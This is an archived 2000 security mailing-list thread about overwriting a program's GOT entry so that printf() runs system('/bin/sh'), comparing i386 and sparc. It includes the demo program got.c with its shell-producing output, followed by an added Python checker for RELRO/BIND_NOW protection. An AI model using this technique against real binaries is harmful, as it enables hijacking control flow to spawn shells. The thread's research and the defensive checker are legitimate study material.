Vulnerability Development mailing list archives
Re: Linux sparc & GOT
From: Guy Cohen <guy () CRYPTO ORG IL>
Date: Sun, 10 Dec 2000 10:37:04 +0200
I think you can find something at www.multimania.com/ouah/archspan.html, a document titled "Architecture spanning shellcode" by eugene () subterrain net.

Michel Kaempf <maxx () VIA ECP FR> wrote:

The following message by Rafal Wojtczuk:
http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-02-01&msg=199801301709.SAA12206 () galera icm edu pl
describes techniques capable of defeating Solar Designer's non-executable stack patch. The little program below exploits the first technique described in Section III: it overwrites the GOT entry of the printf() function with the address of the libc system() function, and therefore does not printf() the string /bin/sh, but runs /bin/sh instead thanks to system().

% cat got.c
#include <stdio.h>
#include <stdlib.h>

int main( int argc, char * argv[] )
{
    unsigned long ul_printf;   /* address of printf's GOT slot (argv[1]) */
    unsigned long ul_system;   /* address of libc system() (argv[2]) */

    if ( argc != 3 ) {
        return( -1 );
    }

    ul_printf = strtoul( argv[1], NULL, 0 );
    ul_system = strtoul( argv[2], NULL, 0 );

    /* patch the GOT slot: the PLT jump for printf now lands in system() */
    *((unsigned long *)ul_printf) = ul_system;

    /* goes through the patched GOT, i.e. system( "/bin/sh" ) */
    printf( "/bin/sh" );

    return( 0 );
}

When running on Linux i386, the program works as expected:

% uname -sm
Linux i686
% gcc -o got got.c
% objdump -R got | grep printf
08049530 R_386_JUMP_SLOT   printf
% gdb got
(gdb) break main
(gdb) run
(gdb) p system
0x163300
(gdb) q
% ./got 0x08049530 0x163300
sh-2.03$

Nice, a shell. On Linux sparc, it does not work as expected:

% uname -sm
Linux sparc64
% gcc -o got got.c
% objdump -R got | grep printf
0000000000021a04 R_SPARC_JMP_SLOT  printf
% gdb got
(gdb) break main
(gdb) run
(gdb) p system
0x7007a528
(gdb) q
% ./got 0x0000000000021a04 0x7007a528
/bin/sh

No shell, but a printf(). The PLT (Procedure Linkage Table) and the GOT (Global Offset Table) are not the same on i386 and sparc. When disassembling the linker code on both architectures, or comparing the `objdump -R' and `objdump -T' outputs, the results are obviously different. Question is: is there a known way to achieve the same technique on Linux sparc?

I know the non-executable stack patch only works on i386 architectures, but maybe something similar could be implemented in the future for sparc processors, and anyway, the ultimate goal is to be able to write portable exploits, working on both sparc and i386 architectures without modifications.

Thanks,

--
MaXX
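As an added example (not code from either post), here is a Python checker for the mitigation that later closed the GOT-overwrite technique on any architecture: it parses an ELF image's program headers and dynamic section and reports whether the GOT is still writable at runtime the way got.c requires. With PT_GNU_RELRO plus BIND_NOW (full RELRO) the loader remaps every GOT slot read-only before main() runs, so the store in got.c faults instead of redirecting printf() to system(); with RELRO but lazy binding, the printf() slot in .got.plt stays writable. The function names and the headers-only ELF image built by build_sample are constructed for this example.

```python
import struct

# ELF ABI constants: segment types and dynamic tags that decide whether the GOT stays writable.
PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def program_headers(data):
    """Return (is64, endian_prefix, [(p_type, p_offset, p_filesz), ...]) for an ELF32/ELF64 image."""
    assert data[:4] == b"\x7fELF", "not an ELF image"
    is64, end = data[4] == 2, ("<" if data[5] == 1 else ">")
    # ELF64: e_phoff at 32, e_phentsize/e_phnum at 54; ELF32: e_phoff at 28, e_phentsize/e_phnum at 42
    phoff = struct.unpack_from(end + ("Q" if is64 else "I"), data, 32 if is64 else 28)[0]
    phentsize, phnum = struct.unpack_from(end + "HH", data, 54 if is64 else 42)
    # Elf64_Phdr starts type, flags, offset, vaddr, paddr, filesz; Elf32_Phdr starts type, offset, vaddr, paddr, filesz
    fmt = end + ("IIQQQQ" if is64 else "IIIII")
    hdrs = []
    for i in range(phnum):
        f = struct.unpack_from(fmt, data, phoff + i * phentsize)
        hdrs.append((f[0], f[2], f[5]) if is64 else (f[0], f[1], f[4]))
    return is64, end, hdrs

def got_protection(data):
    """'none': GOT writable (got.c works); 'partial': PT_GNU_RELRO but lazy binding, so the
    .got.plt slots such as printf's stay writable (got.c still works); 'full': RELRO + BIND_NOW,
    every slot is read-only before main() runs and the store in got.c faults."""
    is64, end, hdrs = program_headers(data)
    relro = any(t == PT_GNU_RELRO for t, _, _ in hdrs)
    bind_now = False
    fmt, size = (end + "qQ", 16) if is64 else (end + "iI", 8)   # Elf64_Dyn / Elf32_Dyn
    for p_type, p_offset, p_filesz in hdrs:
        if p_type != PT_DYNAMIC:
            continue
        for off in range(p_offset, p_offset + p_filesz, size):
            tag, val = struct.unpack_from(fmt, data, off)
            if tag == DT_NULL:
                break
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                bind_now = True
    return "full" if relro and bind_now else ("partial" if relro else "none")

def build_sample(relro, bind_now):
    """Constructed little-endian ELF64 image (headers only, not a runnable binary) for offline testing."""
    dyn = (struct.pack("<qQ", DT_FLAGS_1, DF_1_NOW) if bind_now else b"") + struct.pack("<qQ", DT_NULL, 0)
    ph = struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, 64 + 2 * 56, 0x3000, 0x3000, len(dyn), len(dyn), 8)
    ph += struct.pack("<IIQQQQQQ", PT_GNU_RELRO if relro else 1, 4, 0, 0x2000, 0x2000, 0x1000, 0x1000, 1)
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x1000, 64, 0, 0, 64, 56, 2, 64, 0, 0)
    return ehdr + ph + dyn
```

On a real binary, call got_protection(open(path, "rb").read()); `readelf -l` and `readelf -d` show the same GNU_RELRO segment and BIND_NOW flags the checker looks for.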
Current thread:
- Linux sparc & GOT Michel Kaempf (Dec 10)
- Re: Linux sparc & GOT Guy Cohen (Dec 11)